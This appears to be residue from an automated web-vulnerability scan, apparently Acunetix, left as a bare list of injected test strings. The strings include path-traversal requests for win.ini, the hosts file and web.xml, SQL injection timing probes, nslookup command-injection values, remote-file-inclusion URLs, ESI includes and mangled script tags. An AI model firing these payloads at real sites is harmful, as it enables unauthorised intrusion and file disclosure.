• /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
  • esi:include src=http://testasp.vulnweb.com/rpb.png/
  • 1 OR 2+1891891=0+0+0+1
  • ..\..\..\..\..\..\..\..\windows\win.ini
  • 1 OR 2+1121121=0+0+0+1 or JIlQKoAL=
  • 12345\\)|]
  • ................windowswin.ini
  • 1 OR 2+7277271=0+0+0+1
  • ????????????????????????????????????????????????windows??win.ini
  • 1 OR 2+4804801=0+0+0+1
  • ../../../../../../../../../../windows/win.ini
  • 1 OR 2+3843841=0+0+0+1
  • &nslookup gqT1BfxP&\`0&nslookup gqT1BfxP&`
  • C:\WINDOWS\system32\drivers\etc\hosts
  • DB882Msy
  • (nslookup Kfzsm6Dk)
  • ../../../../../../../../../../windows/win.ini
  • 1
  • a7wnZUnh
  • set|set&set
  • 1
  • +response.write(90738739276592)+
  • +response.write(90738739276592)+
  • response.write(90738739276592)
  • 19887700
  • ()&acxScRiPt wrzn(9926)/ScRiPt
  • 1()&acxScRiPt wrzn(9085)/ScRiPt
  • &n974504=v904734
  • ??
  • ??
  • JyI=
  • 19802433
  • s4Mpx
  • ()&acxScRiPt Wmeo(9339)/ScRiPt
  • 1
  • 1()&acxScRiPt Wmeo(9194)/ScRiPt
  • /www.vulnweb.com
  • \
  • 1
  • print(md5(acunetix_wvs_security_test))\
  • http://hitNfQFAo4oNa.bxss.me/
  • print(md5(acunetix_wvs_security_test))
  • action/.
  • print(md5(acunetix_wvs_security_test))a=
  • action
  • print(md5(acunetix_wvs_security_test))a=
  • action
  • print(md5(acunetix_wvs_security_test))
  • WEBINF\web.xml
  • testasp.vulnweb.com
  • WEBINF/web.xml
  • http://testasp.vulnweb.com/t/fit.txt?.jpg
  • Http://testasp.vulnweb.com/t/fit.txt
  • 1some_inexistent_file_with_long_name
  • http://someinexistentwebsite.acu/some_inexistent_file_with_long_name?.jpg
  • 10000206+9999558
  • ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
  • esi:include src=http://testasp.vulnweb.com/rpb.png/
  • ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
  • (select(0)from(select(sleep(3)))v)/+(select(0)from(select(sleep(3)))v)++(select(0)from(select(sleep(3)))v)+/
  • /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
  • 0XOR(if(now()=sysdate(),sleep(3),0))XORZ
  • ..\..\..\..\..\..\..\..\windows\win.ini
  • 0XOR(if(now()=sysdate(),sleep(3),0))XORZ
  • ................windowswin.ini
  • ????????????????????????????????????????????????windows??win.ini
  • if(now()=sysdate(),sleep(9),0)
  • ../../../../../../../../../../windows/win.ini
  • x7cgBBuC))select pg_sleep(9)
  • C:\WINDOWS\system32\drivers\etc\hosts
  • SKnoI1Ug)select pg_sleep(9)
  • ../../../../../../../../../../windows/win.ini
  • jOCquSLyselect pg_sleep(6)
  • eyEFm20i
  • &nslookup 9HutkoUT&\`0&nslookup 9HutkoUT&`
  • (nslookup rUXrL2Mc)
  • set|set&set
  • 1))select pg_sleep(6)
  • 1)select pg_sleep(3)
  • 1select pg_sleep(3)
  • AXxxywRP)) waitfor delay 0:0:9
  • sYIHQPUM) waitfor delay 0:0:9
  • d2DKEOqP waitfor delay 0:0:9
  • 1 waitfor delay 0:0:9
  • 1)) waitfor delay 0:0:9
  • 1) waitfor delay 0:0:9
  • 1 waitfor delay 0:0:6
  • 1 OR 2+6686681=0+0+0+1
  • 1 OR 2+7097091=0+0+0+1 or 9nFYi3ni=
  • 1 OR 2+4554551=0+0+0+1
  • 1 OR 2+5805801=0+0+0+1
  • 1 OR 2+5695691=0+0+0+1
  • HwaRW3FP
  • 1
  • 1
  • 19709209
  • ()&acxScRiPt Ics0(9851)/ScRiPt
  • 1()&acxScRiPt Ics0(9056)/ScRiPt
  • ??